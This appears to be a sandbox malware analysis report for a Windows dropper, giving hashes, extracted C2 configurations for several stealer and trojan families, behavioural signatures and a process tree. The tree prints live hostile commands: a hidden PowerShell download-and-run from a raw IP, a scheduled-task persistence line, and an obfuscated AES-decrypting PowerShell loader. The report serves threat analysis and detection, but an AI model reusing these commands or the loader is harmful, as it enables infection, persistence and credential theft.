Overview

overview

10

Static

static

5

801d72ec72...b3.exe

windows7-x64

10

801d72ec72...b3.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-02-2025 01:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    801d72ec7224439f84feae6c5180cab7b33d6ca0991157486459f8b6c021bbb3.exe

  • Size

    938KB

  • MD5

    9f22f90f783b265755ab279a4bddf9b8

  • SHA1

    47b9ef13ea17273b889d91bf477f14d8fd3833b1

  • SHA256

    801d72ec7224439f84feae6c5180cab7b33d6ca0991157486459f8b6c021bbb3

  • SHA512

    45c303f662b36ba9a84f2fbeb636dd773335bf81c821594470024ac3d24ffb11fd3b6ee9ddf95a0e8531a81fa7d757dfa204a0a586950deccdc300f8a493e520

  • SSDEEP

    24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8aywF:ATvC/MTQYxsWR7ayw

Score
10/10
amadeyhealerlummaredlinesectopratstealc9c9aa5cheatdefaultbootkitcredential_accessdefense_evasiondiscoverydropperexecutioninfostealerpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

lumma

C2

https://mercharena.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Redline family
    redline
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 2 IoCs
  • Sectoprat family
    sectoprat
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
    defense_evasion
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 22 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 35 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 51 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\801d72ec7224439f84feae6c5180cab7b33d6ca0991157486459f8b6c021bbb3.exe
    "C:\Users\Admin\AppData\Local\Temp\801d72ec7224439f84feae6c5180cab7b33d6ca0991157486459f8b6c021bbb3.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:908
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn uxXL6maMdOb /tr "mshta C:\Users\Admin\AppData\Local\Temp\bbhwXmXAf.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1748
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn uxXL6maMdOb /tr "mshta C:\Users\Admin\AppData\Local\Temp\bbhwXmXAf.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4720
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\bbhwXmXAf.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3428
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VRUIZEE4DMYHKGR9E24GWVGXSJON2CDM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5104
        • C:\Users\Admin\AppData\Local\TempVRUIZEE4DMYHKGR9E24GWVGXSJON2CDM.EXE
          "C:\Users\Admin\AppData\Local\TempVRUIZEE4DMYHKGR9E24GWVGXSJON2CDM.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4600
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2164
            • C:\Users\Admin\AppData\Local\Temp\1014060001\6453bb3b98.exe
              "C:\Users\Admin\AppData\Local\Temp\1014060001\6453bb3b98.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3568
              • C:\Users\Admin\AppData\Local\Temp\1014060001\6453bb3b98.exe
                "C:\Users\Admin\AppData\Local\Temp\1014060001\6453bb3b98.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2600
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 956
                7⤵
                • Program crash
                PID:5060
            • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
              "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:4456
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4528
            • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
              "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3436
            • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
              "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2572
              • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
                "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1048
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2572 -s 968
                7⤵
                • Program crash
                PID:1220
            • C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe
              "C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5112
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:844
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1684
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:4020
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  8⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3668
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1460
            • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
              "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3484
            • C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe
              "C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1896
            • C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe
              "C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:4160
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:3584
            • C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe
              "C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5020
            • C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe
              "C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2152
            • C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe
              "C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2284
            • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
              "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:660
              • C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe
                "C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1948
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 660 -s 968
                7⤵
                • Program crash
                PID:4448
            • C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe
              "C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4300
            • C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe
              "C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:376
            • C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe
              "C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:4852
              • C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe
                "C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"
                7⤵
                • Executes dropped EXE
                PID:1372
              • C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe
                "C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:836
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 976
                7⤵
                • Program crash
                PID:2124
            • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
              "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:2172
              • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
                "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                PID:448
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  8⤵
                  • Uses browser remote debugging
                  • Enumerates system info in registry
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:1532
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff87cdecc40,0x7ff87cdecc4c,0x7ff87cdecc58
                    9⤵
                      PID:1416
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,14198188791097262007,9737096468359593202,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1928 /prefetch:2
                      9⤵
                        PID:5104
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2172,i,14198188791097262007,9737096468359593202,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2200 /prefetch:3
                        9⤵
                          PID:376
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,14198188791097262007,9737096468359593202,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2492 /prefetch:8
                          9⤵
                            PID:1612
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,14198188791097262007,9737096468359593202,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3188 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:1996
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,14198188791097262007,9737096468359593202,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:2212
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,14198188791097262007,9737096468359593202,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:1
                            9⤵
                            • Uses browser remote debugging
                            PID:3652
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4560,i,14198188791097262007,9737096468359593202,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4516 /prefetch:8
                            9⤵
                              PID:3564
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4564,i,14198188791097262007,9737096468359593202,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:8
                              9⤵
                                PID:1460
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4736,i,14198188791097262007,9737096468359593202,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:8
                                9⤵
                                  PID:972
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,14198188791097262007,9737096468359593202,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4944 /prefetch:8
                                  9⤵
                                    PID:2460
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  8⤵
                                  • Uses browser remote debugging
                                  PID:3284
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff87cdf46f8,0x7ff87cdf4708,0x7ff87cdf4718
                                    9⤵
                                      PID:1220
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,10803156886904843115,16744221903251959588,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
                                      9⤵
                                        PID:1136
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
